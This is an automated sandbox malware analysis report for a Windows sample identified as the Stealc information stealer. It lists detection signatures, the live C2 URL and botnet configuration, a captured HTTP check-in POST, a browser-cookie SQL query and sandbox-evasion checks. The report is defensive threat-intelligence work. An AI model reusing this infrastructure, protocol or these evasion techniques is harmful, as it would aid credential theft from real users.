Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1540851
MD5:c4d992e32dabd4723370d920a842d759
SHA1:e2ba688cb7d4a7c88c964ec875e62529d63057c7
SHA256:fc379207ec04489ab7610663a20efa6827c0ff39c842335048fccc15f202c447
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C4D992E32DABD4723370D920A842D759)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2796JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2796JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.140000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-24T09:07:10.837642+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.140000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0014C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00147240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00147240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00149AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00149AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00149B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00149B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00158EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00158EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00154910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00154910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0014DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0014E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0014ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00154570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00154570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0014DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0014BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014F68A FindFirstFileA,0_2_0014F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0014F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00153EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00153EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001416D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 43 35 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="hwid"86C5843EB3592398989009------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="build"doma------EHJJKFCBGIDGHIECGCBK--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00144880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJKFCBGIDGHIECGCBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 43 35 38 34 33 45 42 33 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 4b 46 43 42 47 49 44 47 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="hwid"86C5843EB3592398989009------EHJJKFCBGIDGHIECGCBKContent-Disposition: form-data; name="build"doma------EHJJKFCBGIDGHIECGCBK--
                Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/G
                Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171497374.0000000000E34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
                Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpb
                Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm:
                Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
                Source: file.exe, 00000000.00000002.2171497374.0000000000E17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/r

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005118980_2_00511898
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042A89F0_2_0042A89F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005161060_2_00516106
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051C93F0_2_0051C93F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005179220_2_00517922
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005089240_2_00508924
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051B2150_2_0051B215
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050DA950_2_0050DA95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FC2A10_2_004FC2A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051936D0_2_0051936D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1B440_2_003B1B44
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00485BDE0_2_00485BDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059BB870_2_0059BB87
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005853B70_2_005853B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D6C2E0_2_003D6C2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051E41C0_2_0051E41C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050F4BD0_2_0050F4BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005075DD0_2_005075DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A9E470_2_004A9E47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050A65E0_2_0050A65E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042FE130_2_0042FE13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051469D0_2_0051469D
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 001445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: wyvqzkuk ZLIB complexity 0.9950803860792885
                Source: file.exe, 00000000.00000003.2125087117.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00159600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00159600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00153720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00153720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\TINCAT1Z.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2171497374.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookiesp;
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1854464 > 1048576
                Source: file.exeStatic PE information: Raw size of wyvqzkuk is bigger than: 0x100000 < 0x19ea00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.140000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wyvqzkuk:EW;kejrglww:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00159860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00159860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d22e7 should be: 0x1c68ed
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: wyvqzkuk
                Source: file.exeStatic PE information: section name: kejrglww
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015B035 push ecx; ret 0_2_0015B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4879 push 3BF8FBD9h; mov dword ptr [esp], edx0_2_004F48AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E203C push 2673D848h; mov dword ptr [esp], eax0_2_007E2056
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E203C push eax; mov dword ptr [esp], ebx0_2_007E20EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E203C push edx; mov dword ptr [esp], ebx0_2_007E2100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2020 push esi; mov dword ptr [esp], edx0_2_007E2001
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2020 push 7AA0B184h; mov dword ptr [esp], ecx0_2_007E2013
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2020 push 2673D848h; mov dword ptr [esp], eax0_2_007E2056
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2020 push eax; mov dword ptr [esp], ebx0_2_007E20EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E2020 push edx; mov dword ptr [esp], ebx0_2_007E2100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015E075 push es; retf 0_2_0015E076
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015E077 push es; retf 0_2_0015E07A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060C00B push edi; mov dword ptr [esp], eax0_2_0060C02C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BD0F8 push ecx; mov dword ptr [esp], eax0_2_005BD13A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F8A1 push 5E66EB9Ah; mov dword ptr [esp], ebx0_2_0062F8CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F8A1 push 25ACF67Ch; mov dword ptr [esp], esp0_2_0062F8F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F8A1 push 244E9266h; mov dword ptr [esp], esp0_2_0062F927
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push eax; mov dword ptr [esp], edx0_2_005118C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push ebp; mov dword ptr [esp], esp0_2_005118CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push edx; mov dword ptr [esp], 7D0A6EF1h0_2_005118D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push eax; mov dword ptr [esp], 00000004h0_2_005118E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push eax; mov dword ptr [esp], ebx0_2_005119AE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push 7E4C582Fh; mov dword ptr [esp], edx0_2_005119C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push edi; mov dword ptr [esp], 44E06225h0_2_005119FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push 256D0FB8h; mov dword ptr [esp], edx0_2_00511A13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push 3ABF3FBCh; mov dword ptr [esp], ecx0_2_00511A1D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push ebx; mov dword ptr [esp], ebp0_2_00511A6A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push ecx; mov dword ptr [esp], edx0_2_00511A73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push edi; mov dword ptr [esp], ecx0_2_00511A7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push edx; mov dword ptr [esp], esi0_2_00511A9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511898 push ecx; mov dword ptr [esp], eax0_2_00511AEE
                Source: file.exeStatic PE information: section name: wyvqzkuk entropy: 7.95409499130381

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00159860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00159860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13756
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1BB0 second address: 3A1BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1BB6 second address: 3A1BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1BBA second address: 3A1BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5236D0 second address: 5236D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5236D9 second address: 5236E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F8480C71BF6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52385A second address: 523860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523860 second address: 52386A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8480C71BF6h 0x0000000a rdtsc
